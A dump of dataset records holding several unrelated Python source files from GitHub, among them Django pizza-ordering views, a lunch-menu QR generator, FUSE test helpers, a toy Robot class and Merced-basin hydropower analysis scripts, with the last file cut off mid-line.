\"toppings\": Toppings.objects.all()\n }\n return render(request, \"orders/items.html\", context)\n\n\n\ndef subs(request, item_name):\n try:\n if item_name == 'Extra Cheese on any sub':\n context = {\n \"item_name\": item_name,\n \"price\": Subs.objects.get(subs_items__sub = item_name, size = 'Small').price,\n \"subs\": True,\n \"category\": Category.objects.get(menu__menu = \"Subs\").id,\n }\n else:\n context = {\n \"item_name\": item_name,\n \"price\": Subs.objects.get(subs_items__sub = item_name, size = 'Small').price,\n \"subs\": True,\n \"category\": Category.objects.get(menu__menu = \"Subs\").id,\n \"extras\": Extra.objects.all()\n }\n #if subs with small size do not exists\n except Subs.DoesNotExist:\n context = {\n \"item_name\": item_name,\n \"price\": Subs.objects.get(subs_items__sub = item_name, size = 'Large').price,\n \"subs\": True,\n \"category\":Category.objects.get(menu__menu = \"Subs\").id,\n \"extras\": Extra.objects.all()\n }\n return render(request, \"orders/items.html\", context)\n\n return render(request, \"orders/items.html\", context)\n \ndef salad(request, item_name):\n print(Salads.objects.filter(salad = item_name))\n context = {\n \"item_name\": item_name,\n \"category\": Category.objects.get(menu__menu = \"Salad\").id,\n \"price\": Salads.objects.get(salad = item_name).price\n }\n return render(request, \"orders/items.html\", context)\n\ndef dinnerplatter(request, item_name):\n context = {\n \"item_name\": item_name,\n \"category\": Category.objects.get(menu__menu = \"Dinner Platter\").id,\n \"price\": DinnerPlatters.objects.get(platter_item__platter = item_name, size = 'Small').price,\n \"dinnerplatter\": True\n }\n return render(request, \"orders/items.html\", context)\n\n\n#displaying the price \ndef price(request, item_name, size):\n try:\n print(Subs.objects.get(subs_items__sub = item_name, size = size).price)\n context = {\n \"price\": Subs.objects.get(subs_items__sub = item_name, size = size).price\n }\n except Subs.DoesNotExist:\n context = {\n \"price\": DinnerPlatters.objects.get(platter_item__platter = item_name, size = size).price\n }\n return JsonResponse({\"context\": context})\n \ndef pizza_price(request, item_name, size, no_of_toppings):\n if item_name == \"Regular Pizza\":\n context = {\n \"price\": Regular_Pizza.objects.get(size = size, topping = no_of_toppings).price\n }\n else:\n context = {\n \"price\": Sicilian_Pizza.objects.get(size = size, topping = no_of_toppings).price\n }\n return JsonResponse({\"context\": context})\n ","repo_name":"Habiba-Naeem/Pinnochio-pizza-and-subs-for-cs50","sub_path":"orders/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"40272895944","text":"# スーパーFizzBuzz!\nfor i in range(1, int(input()) + 1):\n\tans = \"\"\n\tif i % 2 == 0:\n\t\tans += \"a\"\n\tif i % 3 == 0:\n\t\tans += \"b\"\n\tif i % 4 == 0:\n\t\tans += \"c\"\n\tif i % 5 == 0:\n\t\tans += \"d\"\n\tif i % 6 == 0:\n\t\tans += \"e\"\n\t# 出力\n\tif ans == \"\":\n\t\tprint(i)\n\telse:\n\t\tprint(ans)\n","repo_name":"satoooh/procon","sub_path":"AtCoder/others/nikkei2019-2-qual/E.py","file_name":"E.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"16573904567","text":"import pandas as pd\r\nimport qrcode\r\nimport json\r\nimport datetime\r\nfrom PIL import Image\r\n\r\n# Paso 1: Leer la base de datos de Excel\r\ndef leer_menu(fecha_actual):\r\n try:\r\n menu_df = pd.read_excel('menu.xlsx')\r\n opciones_almuerzo = menu_df[menu_df['Fecha'] == fecha_actual]\r\n return opciones_almuerzo\r\n except FileNotFoundError:\r\n print(\"El archivo 'menu.xlsx' no se encontró. Asegúrate de que el archivo existe y tiene el formato adecuado.\")\r\n return None\r\n\r\n# Paso 2: Permitir al usuario seleccionar alimentos y cantidades\r\ndef seleccionar_alimentos(opciones_almuerzo):\r\n if opciones_almuerzo is None:\r\n return None\r\n \r\n for index, row in opciones_almuerzo.iterrows():\r\n print(f\"Opciones de almuerzo para hoy {row['Fecha']}: \")\r\n print(f\"1. Sopa: {row['Sopa']}\")\r\n print(f\"2. Proteico: {row['Proteico']}\")\r\n print(f\"3. Cereal: {row['Cereal']}\")\r\n print(f\"4. Tubérculo: {row['Tubérculo']}\")\r\n print(f\"5. Vegetariano: {row['Vegetariano']}\")\r\n \r\n alimentos_seleccionados = {}\r\n \r\n while True:\r\n opcion = input(\"Seleccione un alimento por número (o escriba 'terminar' para finalizar): \").strip().lower()\r\n if opcion == 'terminar':\r\n break\r\n \r\n if opcion.isdigit():\r\n opcion_num = int(opcion)\r\n if opcion_num >= 1 and opcion_num <= 5:\r\n if opcion_num==1:\r\n StringComida=row['Sopa']\r\n if opcion_num==2:\r\n StringComida=row['Proteico']\r\n if opcion_num==3:\r\n StringComida=row['Cereal']\r\n if opcion_num==4:\r\n StringComida=row['Tubérculo']\r\n if opcion_num==5:\r\n StringComida=row['Vegetariano']\r\n\r\n cantidad = (input(f\"Ingrese la cantidad de porciones de {StringComida} (Escribe 'ayuda' si no conoces las porciones): \"))\r\n if cantidad == \"ayuda\":\r\n im=Image.open(\"Porcionamiento.png\")\r\n im.show()\r\n cantidad = (input(f\"Ingrese la cantidad de porciones de {StringComida}: \"))\r\n cantidad=int(cantidad)\r\n columna = opciones_almuerzo.columns[opcion_num]\r\n if cantidad >5:\r\n cantidad=5\r\n elif cantidad <1:\r\n cantidad=1\r\n alimentos_seleccionados[columna] = cantidad\r\n else:\r\n print(\"Número de opción no válido. Intente nuevamente.\")\r\n else:\r\n print(\"Entrada no válida. Intente nuevamente.\")\r\n \r\n return alimentos_seleccionados\r\n\r\n# Paso 3: Generar un código QR con las selecciones del usuario\r\ndef generar_qr(selecciones):\r\n qr = qrcode.QRCode(\r\n version=1,\r\n error_correction=qrcode.constants.ERROR_CORRECT_L,\r\n box_size=10,\r\n border=4,\r\n )\r\n \r\n selecciones_json = json.dumps(selecciones)\r\n \r\n qr.add_data(selecciones_json)\r\n qr.make(fit=True)\r\n \r\n img = qr.make_image(fill_color=\"black\", back_color=\"white\")\r\n img.save(\"codigo_qr.png\")\r\n\r\ntry:\r\n # Obtener la fecha actual\r\n fecha_actual = datetime.datetime.now().strftime(\"%b-%d\")\r\n\r\n # Paso 1: Leer el menú para la fecha actual\r\n opciones_almuerzo = leer_menu(fecha_actual)\r\n\r\n # Paso 2: Permitir al usuario seleccionar alimentos y cantidades\r\n alimentos_seleccionados = seleccionar_alimentos(opciones_almuerzo)\r\n\r\n if alimentos_seleccionados:\r\n # Paso 3: Generar un código QR con las selecciones del usuario\r\n generar_qr(alimentos_seleccionados)\r\n\r\n print(\"Código QR generado con las selecciones de alimentos.\")\r\n print(f\"Alimentos seleccionados: {alimentos_seleccionados}\")\r\n else:\r\n print(\"No se pudieron seleccionar alimentos.\")\r\nexcept Exception as e:\r\n print(f\"Ocurrió un error: {str(e)}\")","repo_name":"JuandaGrande/DigiAlmuerzos","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3957,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"41751435694","text":"# Method-2 Iterative Method\ndef firstUniqueCharacter(str):\n for i in range(len(str)):\n isFound = True\n for j in range(len(str)):\n if i == j:\n continue\n if str[i] == str[j]:\n isFound = False\n break\n if(isFound):\n return i\n return -1\n\n# Time Complexity : O(n^2)\n# Space Complexity : O(1)","repo_name":"OrionJoshi/Competitive_Programming","sub_path":"19. First Unique Character in a String/Method-2.py","file_name":"Method-2.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"82"} +{"seq_id":"30614351495","text":"# Write a program that prompts for a file name, then opens that file and reads through the file, \n# looking for lines of the form:\n# X-DSPAM-Confidence: 0.8475\n# Count these lines and extract the floating point values from each of the lines and compute the \n# average of those values and produce an output as shown below.\n# You can download the sample data at http://www.pythonlearn.com/code/mbox-short.txt when you are \n# testing below enter mbox-short.txt as the file name.\n# Average spam confidence: 0.750718518519\n\nfile = input(\"Enter the file name:\")\nfHandle = open(file)\ncount = 0\nts = 0\n\nfor line in fHandle:\n\tif not line.startswith(\"X-DSPAM-Confidence:\"): continue\n\tpos = line.find(\"0\")\n\tts += float(line[pos:])\n\tcount += 1\n\naverage = ts / count\nprint(\"Average spam confidence = \",average)\n\n\n","repo_name":"aabs7/Python-for-everybody-Specialization","sub_path":"CourseII/assignment7.2.py","file_name":"assignment7.2.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"13958743056","text":"# Define Global Variables\r\nimport dna\r\n\r\nscreen_width = 700\r\nscreen_height = 700\r\n\r\nmale = \"M\"\r\nfemale = \"F\"\r\nlight = \"Light\"\r\nmid = \"Mid\"\r\ndark = \"Dark\"\r\nfood_generator = 0\r\n\r\nrabbits = []\r\nwater_sources = []\r\nfoxes = []\r\nfood = []\r\nrocks = []\r\n\r\nfox_spawn_numbers = [6, 15, 30, 60, 70, 100, 200, 9000000000]\r\nind = 0\r\n\r\npop_timer = 0\r\ndeaths = 0\r\nthirst_deaths = 0\r\nhunger_deaths = 0\r\nfox_deaths = 0\r\nnum_males = 0\r\nnum_females = 0\r\nmax_population = []\r\npopulation_over_time = []\r\ngenes = []\r\nlifespans = []\r\n\r\nr_light = (166, 111, 111)\r\nr_mid = (105, 68, 68)\r\nr_dark = (77, 50, 50)\r\ngrass_green = (27, 207, 84)\r\nfood_green = (7, 112, 40)\r\nwater_blue = (14, 90, 204)\r\nfox_orange = (247, 144, 0)\r\nrock_gray = (96, 88, 97)\r\n","repo_name":"AKenney31/RabbitSimulator","sub_path":"globals.py","file_name":"globals.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"20076195793","text":"import stdio\nimport sys\nfrom blob_finder import BlobFinder\nfrom picture import Picture\n\n\n# Takes an integer P, a float tau, a float delta, and a sequence of JPEG\n# filenames as command-line arguments; identifies the beads in each JPEG\n# image using BlobFinder; and writes out (one per line, formatted with 4\n# decimal places to the right of decimal point) the radial distance that\n# each bead moves from one frame to the next (assuming it is no more than\n# delta).\ndef main():\n P = int(sys.argv[1])\n tau = float(sys.argv[2])\n delta = float(sys.argv[3])\n seq = sys.argv[4:]\n test = []\n for i in range(1, len(seq)):\n pic = Picture(seq[i - 1])\n bf = BlobFinder(pic, tau)\n beads = bf.getBeads(P)\n pic = Picture(seq[i])\n bf = BlobFinder(pic, tau)\n beads2 = bf.getBeads(P)\n for q in beads2:\n for a in beads:\n test += [q.distanceTo(a)]\n if min(test) <= delta:\n stdio.writef('%.4f\\n', min(test))\n test = []\n\nif __name__ == '__main__':\n main()\n","repo_name":"hshastri/Atomic-Nature","sub_path":"bead_tracker.py","file_name":"bead_tracker.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"22589363181","text":"#!/usr/bin/env python3\nimport subprocess\nimport pytest\nimport os\nimport stat\nimport time\nfrom os.path import join as pjoin\nimport sys\nimport re\nimport itertools\n\nbasename = os.path.dirname(os.path.abspath(__file__))\nfusermount3_dir = \"/home/yy354/opt-dev/bin\"\n\n\ndef test_printcap():\n cmdline = base_cmdline + [ pjoin(basename, 'example', 'printcap') ]\n proc = subprocess.Popen(cmdline, stdout=subprocess.PIPE,\n universal_newlines=True)\n (stdout, _) = proc.communicate(30)\n assert proc.returncode == 0\n\n proto = None\n caps = set()\n for line in stdout.split('\\n'):\n if line.startswith('\\t'):\n caps.add(line.strip())\n continue\n\n hit = re.match(r'Protocol version: (\\d+)\\.(\\d+)$', line) \n if hit:\n proto = (int(hit.group(1)), int(hit.group(2)))\n\n return (proto, caps)\n\n\ndef wait_for_mount(mount_process, mnt_dir,\n test_fn=os.path.ismount):\n elapsed = 0\n while elapsed < 20:\n if test_fn(mnt_dir):\n print(\" -------- Fuse mount succeed -------\")\n return True\n if mount_process.poll() is not None:\n pytest.fail('file system process terminated prematurely')\n time.sleep(0.1)\n elapsed += 0.1\n pytest.fail(\"mountpoint failed to come up\")\n\n\ndef compare_dirs(output, expected):\n for dir in output:\n if not dir in expected:\n return False\n for dir in expected:\n if not dir in output:\n return False\n return True\n \n\ndef cleanup(mount_process, mnt_dir):\n # Don't bother trying Valgrind if things already went wrong\n\n if 'bsd' in sys.platform or 'dragonfly' in sys.platform:\n cmd = [ 'umount', '-f', mnt_dir ]\n else:\n cmd = [pjoin(basename, 'util', 'fusermount3'),\n '-z', '-u', mnt_dir]\n subprocess.call(cmd, stdout=subprocess.DEVNULL,\n stderr=subprocess.STDOUT)\n mount_process.terminate()\n try:\n mount_process.wait(1)\n except subprocess.TimeoutExpired:\n mount_process.kill()\n\ndef umount(mnt_dir):\n\n if 'bsd' in sys.platform or 'dragonfly' in sys.platform:\n cmdline = [ 'umount', mnt_dir ]\n else:\n # fusermount3 will be setuid root, so we can only trace it with\n # valgrind if we're root\n if os.getuid() == 0:\n cmdline = base_cmdline\n else:\n cmdline = []\n cmdline = cmdline + [ pjoin(fusermount3_dir, 'fusermount3'),\n '-z', '-u', mnt_dir ]\n subprocess.check_call(cmdline)\n assert not os.path.ismount(mnt_dir)\n\n \n\n\n\ndef safe_sleep(secs):\n '''Like time.sleep(), but sleep for at least *secs*\n `time.sleep` may sleep less than the given period if a signal is\n received. This function ensures that we sleep for at least the\n desired time.\n '''\n\n now = time.time()\n end = now + secs\n while now < end:\n time.sleep(end - now)\n now = time.time()\n\n\ndef powerset(iterable):\n s = list(iterable)\n return itertools.chain.from_iterable(\n itertools.combinations(s, r) for r in range(len(s)+1))\n\n\n# Use valgrind if requested\nif os.environ.get('TEST_WITH_VALGRIND', 'no').lower().strip() \\\n not in ('no', 'false', '0'):\n base_cmdline = [ 'valgrind', '-q', '--' ]\nelse:\n base_cmdline = []\n\n# Try to use local fusermount3\nos.environ['PATH'] = '%s:%s' % (pjoin(basename, 'util'), os.environ['PATH'])\n# Put example binaries on PATH\nos.environ['PATH'] = '%s:%s' % (pjoin(basename, 'example'), os.environ['PATH'])\n\ntry:\n (fuse_proto, fuse_caps) = test_printcap()\nexcept:\n # Rely on test to raise error\n fuse_proto = (0,0)\n fuse_caps = set()\n","repo_name":"Derecho-Project/cascade","sub_path":"src/service/fuse/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":3702,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"82"} +{"seq_id":"6718971293","text":"from ClassAppliance import Appliance\n\n\nclass Robot(Appliance):\n def __init__(self, name, power=False, battery=101, skills=None, phrases=None):\n super().__init__(power)\n if skills is None and phrases is None:\n skills = [\"Say Robot name\", \"Charge\", \"Battery Status\", \"Learn phrases\"]\n phrases = []\n self.__name = name\n self.__battery = battery\n self.__skills = skills\n self.__phrases = phrases\n\n @property\n def name(self):\n return self.__name\n\n @property\n def battery(self):\n return self.__battery\n\n @property\n def skills(self):\n return self.__skills\n\n @property\n def phrases(self):\n return self.__phrases\n\n @name.setter\n def name(self, name):\n if self.power == \"On\":\n self.__name = name\n\n @phrases.setter\n def phrases(self, *args):\n if self.power == \"On\":\n self.__phrases.append(phrase for phrase in args)\n\n def say_robot_name(self):\n if self.power == \"On\":\n self.__battery -= 1\n return f\"Hi, Nice to meet you\\nMy name is {self.name}\"\n else:\n return \"...\"\n\n def charge(self):\n if self.power == \"On\":\n if self.battery < 101:\n self.__battery = 101\n return f\"Gimme a minute to charge...\\n DONE\"\n else:\n return f\"I'm fully charged\"\n else:\n return '...'\n\n def battery_status(self):\n if self.power == \"On\":\n self.__battery -= 1\n if self.battery <= 25:\n return f\"Battery: {self.battery}%\\n\" \\\n f\"I think i might need a little charge\"\n\n elif self.battery < 100:\n return f\"Battery: {self.battery}%\\n\"\n\n elif self.battery >= 100:\n return f\"Battery: {self.battery}%\\n\" \\\n f\"I'm full!\"\n else:\n return f\"...\"\n\n def learn_phrase(self, phrase):\n while len(self.phrases) < 6 and self.power == \"On\":\n if phrase not in self.phrases:\n self.phrases.append(phrase)\n self.__battery -= 5\n return f'Phrase Added'\n else:\n print(\"I know that one, teach me another phrase\")\n phrase = input('>>> ')\n else:\n if self.power == \"On\":\n return f'Memory full'\n else:\n return f'...'\n\n def show_phrases(self):\n if self.power == \"On\":\n self.__battery -= 3\n print('I know these phrases:\\n')\n for index in range(len(self.phrases)):\n print(f'|{index + 1}|{self.phrases[index]}|')\n return f'Done'\n else:\n return '...'\n\n def show_a_phrase(self, phrase_number):\n if self.power == 'On':\n self.__battery -= 3\n for index in range(len(self.phrases)):\n if index == phrase_number - 1:\n return f'{self.phrases[index]}'\n else:\n return f'Phrase not found!\\nbe sure you put the right phrase number...'\n else:\n return '...'\n\n","repo_name":"MattV-Fayesg/RandomClasses","sub_path":"Robot.py","file_name":"Robot.py","file_ext":"py","file_size_in_byte":3213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"28044645698","text":"import matplotlib.pyplot as plt\n# from matplotlib import pylab\nimport math\nimport numpy as np\n\ny=[]\nw=[]\nf = open(\"accuracy.txt\", \"r\")\nfor each in f:\n # TO IGNORE VALUES STARTING FROM 0.0\n # if each[0:3] != \"0.0\": \n each = float(each)*100\n each1 = round(each,2)\n w.append(each1)\n math.floor(each)\n each = int(each)\n y.append(each)\n \nf.close()\n\n# w.sort()\n# y.sort()\n\nq=len(y)+1\nfig ,ax = plt.subplots(figsize=(14,10))\n\nx=np.arange(0,10,0.1)\nz=[]\nfor i in range(len(y)):\n z.append(i+1)\n\nplt.scatter(z,y)\nplt.plot(z,y)\nplt.ylim([0,100])\nplt.xlim([0,q])\n\n# FOR CO-ORDINATES\n# for i,j in zip(z,w):\n# plt.text(i,j+0.5,'({},{})'.format(i,j),fontdict={'fontsize':12})\n\nplt.xlabel('Accuracy',fontdict={'fontsize':20})\nplt.ylabel('Test-cases',fontdict={'fontsize':20})\nplt.title('Accuracy Trends',fontsize=25,color=\"blue\")\nplt.show()\n\n","repo_name":"Diplo2by/Easy_CT","sub_path":"graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"43263022102","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport matplotlib.dates as mdates\nimport seaborn as sns\nimport numpy as np\n\nreservoirs = [\"node/Lake McClure/storage\", \"node/Lake McClure/observed storage\"]\npowerhouses = [\"node/New Exchequer PH/Fixed head\", \"node/New Merced Falls PH/Fixed head\", \"node/New McSwain PH/Fixed head\"]\npowerhouse_flows = [\"MERCE-L-CON3 [link]\", \"Merced PH Inflow\", \"McSwain PH Inflow\"]\nph_gauge = [\"node/Lake McClure Inflow/flow\", \"MERCE-L-CON2 [link]\", \"MERCE-L-CON4 [link]\", \"node/Near Stevinson_11272500/flow\"]\nifrs = [\"node/blwNewExchequerPH/flow\", \"node/Merced R below Crocker-Huffman Dam/flow\", \"Lake McClure Flood Control [node]\"]\nifrs_req = [\"node/blwNewExchequerPH/requirement\", \"node/Merced R below Crocker-Huffman Dam/requirement\", \"node/Lake McClure Flood Control [node]/requirement\"]\n\n\ndef change_month(month):\n if month == 10:\n return 1\n elif month == 11:\n return 2\n elif month == 12:\n return 3\n elif month == 1:\n return 4\n elif month == 2:\n return 5\n elif month == 3:\n return 6\n elif month == 4:\n return 7\n elif month == 5:\n return 8\n elif month == 6:\n return 9\n elif month == 7:\n return 10\n elif month == 8:\n return 11\n else:\n return 12\n\ndef change_season(month):\n if month in [1,2,3]:\n return 1\n elif month in [4,5,6]:\n return 2\n elif month in [7,8,9]:\n return 3\n else:\n return 4\n\ndef generate_csv_climate():\n global reservoirs\n global powerhouses\n global ph_gauge\n # Generate Hydropower Generation\n water_density = 1000\n gravity = 9.81\n efficiency = 0.9\n mcm_to_cms = 1000000 / (24 * 3600)\n\n climate_scenarios = [\"CanESM2_rcp45\", \"CanESM2_rcp85\", \"CNRM-CM5_rcp45\", \"CNRM-CM5_rcp85\", \"HadGEM2-ES_rcp45\",\n \"HadGEM2-ES_rcp85\", \"MIROC5_rcp45\", \"MIROC5_rcp85\"]\n climate_change_scenarios = pd.read_csv(\"climate_change.csv\", index_col=[0])\n return_csv = pd.DataFrame()\n return_csv[\"Recorder\"] = climate_change_scenarios[climate_scenarios[1] + \"/Recorder\"]\n return_csv[\"WYT_Year_Type\"] = climate_change_scenarios[climate_scenarios[0] + \"/WYT_Year_Type\"]\n return_csv[\"Water_Year\"] = climate_change_scenarios[climate_scenarios[0] + \"/Water_Year\"]\n for climate_scenario in climate_scenarios:\n results_csv = climate_change_scenarios.filter(regex=climate_scenario)\n\n return_csv[climate_scenario + \"/Lake McClure Storage\"] = results_csv[\n climate_scenario + \"/node/Lake McClure/storage\"] * 0.81071318210885\n\n # 1 Inflow to McClure\n return_csv[climate_scenario + \"/Lake McClure Inflow\"] = (\n results_csv[climate_scenario + \"/node/Lake McClure Inflow/flow\"] * mcm_to_cms)\n # 2 Outflow from Merced Basin\n return_csv[climate_scenario + \"/node/Basin Outflow/flow\"] = results_csv[\n climate_scenario + \"/node/Near Stevinson_11272500/flow\"] * 0.81071318210885\n # 3 Flood days Out of Lake McClure\n return_csv[climate_scenario + \"/Lake McClure Outflow Flood Days\"] = ((results_csv[\n climate_scenario + \"/MERCE-L-CON2 [link]\"] +\n results_csv[\n climate_scenario + \"/MERCE-L-CON4 [link]\"]) > 15.9).astype(\n int)\n # Flood days Into Lake McClure\n return_csv[climate_scenario + \"/Lake McClure Inflow Flood Days\"] = (\n (results_csv[climate_scenario + \"/node/Lake McClure Inflow/flow\"] * mcm_to_cms) > 14.68).astype(int)\n\n # 5 No. of days IRFs not being met\n for index, value in enumerate(ifrs):\n # Sum up time the IFR did not pass\n return_csv[climate_scenario + \"/\" + value + \"/ifr_not_met\"] = (\n results_csv[climate_scenario + \"/\" + ifrs_req[index]] - results_csv[\n climate_scenario + \"/\" + ifrs[index]] > 0.0001).astype(int)\n\n # 6 Total HP production (MWH)\n return_csv[climate_scenario + \"/Hydropower Production\"] = 0\n for index, powerhouse in enumerate(powerhouses):\n return_csv[climate_scenario + \"/Hydropower Production\"] = return_csv[\n climate_scenario + \"/Hydropower Production\"] + \\\n (efficiency * water_density * gravity * \\\n results_csv[climate_scenario + \"/\" + powerhouse] \\\n * results_csv[\n climate_scenario + \"/\" + powerhouse_flows[\n index]] / 3600)\n return return_csv\n\ndef generate_csv_historic():\n global reservoirs\n global powerhouses\n global ph_gauge\n # Generate Hydropower Generation\n water_density = 1000\n gravity = 9.81\n efficiency = 0.9\n mcm_to_cms = 1000000 / (24 * 3600)\n\n columns = [\"Recorder\", \"Release Requirement\", \"WYT_Year_Type\", \"Water_Year\"]\n columns = columns + reservoirs + powerhouses + powerhouse_flows + ph_gauge + ifrs + ifrs_req\n\n results_csv = pd.read_csv(\"merced/results.csv\", skiprows=[1])\n wyt_csv = pd.read_csv(\"merced/s3_imports/WYT.csv\", index_col=[0])\n results_csv = results_csv[columns].copy()\n return_csv = results_csv[\n [\"Recorder\", \"node/Lake McClure/storage\", \"node/Lake McClure/observed storage\", \"WYT_Year_Type\",\n \"Water_Year\"]].copy()\n return_csv[\"Lake McClure Storage\"] = results_csv[\"node/Lake McClure/storage\"] * 0.81071318210885\n # 1 Inflow to McClure\n return_csv[\"Lake McClure Inflow\"] = (results_csv[\"node/Lake McClure Inflow/flow\"] * mcm_to_cms)\n # 2 Outflow from Merced Basin\n return_csv[\"node/Basin Outflow/flow\"] = results_csv[\"node/Near Stevinson_11272500/flow\"] * 0.81071318210885\n # 3 Flood days Out of Lake McClure\n return_csv[\"Lake McClure Outflow Flood Days\"] = (\n (results_csv[\"MERCE-L-CON2 [link]\"] + results_csv[\"MERCE-L-CON4 [link]\"]) > 15.9).astype(int)\n # 4 Flood Days Into Lake McClure\n return_csv[\"Lake McClure Inflow Flood Days\"] = (\n (results_csv[\"node/Lake McClure Inflow/flow\"] * mcm_to_cms) > 14.68).astype(int)\n # 5 No. of days IRFs not being met\n for index, value in enumerate(ifrs):\n # Sum up time the IFR did not pass\n return_csv[value + \"/ifr_not_met\"] = (results_csv[ifrs_req[index]] - results_csv[ifrs[index]] > 0.0001).astype(\n int)\n # 6 Total HP production (MWH)\n return_csv[\"Hydropower Production\"] = 0\n for index, powerhouse in enumerate(powerhouses):\n return_csv[\"Hydropower Production\"] = return_csv[\"Hydropower Production\"] + (\n efficiency * water_density * gravity * results_csv[powerhouse] \\\n * results_csv[powerhouse_flows[index]] / 3600)\n\n return return_csv\n\ndef graph_files(climate_change_csv , historic_csv):\n pd.options.mode.chained_assignment = None\n results_hist_csv = historic_csv\n results_climate_csv = climate_change_csv\n\n for index in range(0,4):\n ## Storage\n if index == 0:\n modify_results_hist_csv = results_hist_csv.iloc[:, [0, 2, 3]]\n results_climate_csv_45 = results_climate_csv.iloc[:, [0, 2, 3, 21, 39, 57]]\n results_climate_csv_85 = results_climate_csv.iloc[:, [0, 2, 12, 30, 48, 66]]\n file_name = \"Storage\"\n y_label = \"Volume (TAF)\"\n y_lim_low = 0\n y_lim_high = 1200\n ##Inflow\n if index == 1:\n modify_results_hist_csv = results_hist_csv.iloc[:,[0,2,6]]\n results_climate_csv_45 = results_climate_csv.iloc[:,[0,2,4,22,40,58]]\n results_climate_csv_85 = results_climate_csv.iloc[:,[0,2,13,31,49,67]]\n file_name = \"Inflow\"\n y_label = \"Discharge (TAF)\"\n y_lim_low = 0\n y_lim_high = 1500\n ##Outflow\n if index == 2:\n modify_results_hist_csv = results_hist_csv.iloc[:,[0,2,7]]\n results_climate_csv_45 = results_climate_csv.iloc[:,[0,2,5,23,41,59]]\n results_climate_csv_85 = results_climate_csv.iloc[:,[0,2,14,32,50,68]]\n file_name = \"Outflow\"\n y_label = \"Discharge (TAF)\"\n y_lim_low = 0\n y_lim_high = 300\n ##HP Production\n if index == 3:\n modify_results_hist_csv = results_hist_csv.iloc[:, [0, 2, 13]]\n results_climate_csv_45 = results_climate_csv.iloc[:, [0, 2, 11, 29, 47, 65]]\n results_climate_csv_85 = results_climate_csv.iloc[:, [0, 2, 20, 38, 56, 74]]\n file_name = \"HP\"\n y_label = \"HP Production (MWh)\"\n y_lim_low = 0\n y_lim_high = 40000\n\n modify_results_hist_csv.columns = ['Date', 'WY', 'Historic']\n modify_results_hist_csv['Month'] = pd.DatetimeIndex(modify_results_hist_csv['Date']).month\n modify_results_hist_csv['Day'] = pd.DatetimeIndex(modify_results_hist_csv['Date']).dayofyear\n\n modify_results_hist_csv[\"WYT_Month\"] = modify_results_hist_csv[\"Month\"].apply(lambda x: change_month(x))\n modify_results_hist_csv[\"WYT_Season\"] = modify_results_hist_csv[\"WYT_Month\"].apply(lambda x: change_season(x))\n\n results_hist_csv_melt = pd.melt(modify_results_hist_csv,\n id_vars=[\"Date\", \"WY\", \"Month\", \"WYT_Month\", \"WYT_Season\"],\n value_vars=[\"Historic\"],\n var_name=[\"Scen\"],\n value_name=\"Values\"\n )\n\n results_climate_csv_45.columns = ['Date', 'WY', 'CanESM2', 'CNRM-CM5', 'HadGEM2', 'MIROC5']\n results_climate_csv_85.columns = ['Date', 'WY', 'CanESM2', 'CNRM-CM5', 'HadGEM2', 'MIROC5']\n results_climate_csv_45[\"Date\"] = pd.to_datetime(results_climate_csv_45[\"Date\"])\n results_climate_csv_85[\"Date\"] = pd.to_datetime(results_climate_csv_85[\"Date\"])\n\n results_climate_csv_45['Month'] = results_climate_csv_45[\"Date\"].dt.month\n results_climate_csv_85['Month'] = results_climate_csv_85[\"Date\"].dt.month\n\n results_climate_csv_45[\"WYT_Month\"] = results_climate_csv_45[\"Month\"].apply(lambda x: change_month(x))\n results_climate_csv_85[\"WYT_Month\"] = results_climate_csv_85[\"Month\"].apply(lambda x: change_month(x))\n results_climate_csv_45[\"WYT_Season\"] = results_climate_csv_45[\"WYT_Month\"].apply(lambda x: change_season(x))\n results_climate_csv_85[\"WYT_Season\"] = results_climate_csv_85[\"WYT_Month\"].apply(lambda x: change_season(x))\n\n results_climate_csv_melt_45 = pd.melt(results_climate_csv_45,\n id_vars=[\"Date\", \"WY\", \"Month\", \"WYT_Month\", \"WYT_Season\"],\n value_vars=['CanESM2', 'CNRM-CM5', 'HadGEM2', 'MIROC5'],\n var_name=[\"Scen\"],\n value_name=\"Values\"\n )\n results_climate_csv_melt_85 = pd.melt(results_climate_csv_85,\n id_vars=[\"Date\", \"WY\", \"Month\", \"WYT_Month\", \"WYT_Season\"],\n value_vars=['CanESM2', 'CNRM-CM5', 'HadGEM2', 'MIROC5'],\n var_name=[\"Scen\"],\n value_name=\"Values\"\n )\n graph_data_45 = pd.concat([results_hist_csv_melt, results_climate_csv_melt_45])\n graph_data_85 = pd.concat([results_hist_csv_melt, results_climate_csv_melt_85])\n\n plt_color = [\"#505050\", \"#c1f215\", \"#00cdcd\", \"#ffa500\", \"#c6b6e0\"]\n sns.set(style=\"whitegrid\", rc={'figure.figsize': (20.7, 13.27)}, font_scale=2.0)\n plt.rcParams[\"figure.figsize\"] = [16, 9]\n sns.boxplot(data=graph_data_45, x=\"WYT_Month\", y=\"Values\", hue=\"Scen\", palette=plt_color)\n # sns.lineplot(x=\"Day\", y=\"Values\", hue=\"Scen\", data=graph_data_45, palette=plt_color)\n # plt.xticks(np.arange(4), [\"OND\", \"JFM\", \"AMJ\", \"JAS\"])\n plt.xticks(np.arange(12), [\"Oct\", \"Nov\", \"Dec\", \"Jan\", \"Feb\", \"Mar\", \"Apr\", \"May\", 